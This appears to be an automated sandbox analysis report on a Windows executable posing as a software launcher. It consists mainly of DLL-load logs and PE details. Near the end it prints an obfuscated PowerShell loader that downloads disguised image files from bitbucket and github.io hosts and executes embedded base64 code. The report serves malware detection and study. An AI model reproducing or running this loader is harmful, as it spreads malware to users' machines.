Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: IMSoftware{Launcher}3.21.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: IMSoftware{Launcher}3.21.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: IMSoftware{Launcher}3.21.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: IMSoftware{Launcher}3.21.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: IMSoftware{Launcher}3.21.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: IMSoftware{Launcher}3.21.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: IMSoftware{Launcher}3.21.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: IMSoftware{Launcher}3.21.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: IMSoftware{Launcher}3.21.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wextract.pdb source: IMSoftware{Launcher}3.21.exe
Source:	Binary string: wextract.pdbGCTL source: IMSoftware{Launcher}3.21.exe

Source: IMSoftware{Launcher}3.21.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: IMSoftware{Launcher}3.21.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: IMSoftware{Launcher}3.21.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: IMSoftware{Launcher}3.21.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: IMSoftware{Launcher}3.21.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZgBz@GQ@ZgBz@GQ@ZgBz@C8@ZgBz@GQ@ZgBk@HM@ZgBz@GQ@ZgBz@GQ@Zg@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@y@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Ck@L@@g@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBv@GY@aQBj@GU@Mw@2@DU@LgBn@Gk@d@Bo@HU@Yg@u@Gk@bw@v@DE@LwB0@GU@cwB0@C4@agBw@Gc@Jw@p@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZgBz@GQ@ZgBz@GQ@ZgBz@C8@ZgBz@GQ@ZgBk@HM@ZgBz@GQ@ZgBz@GQ@Zg@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@y@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Ck@L@@g@C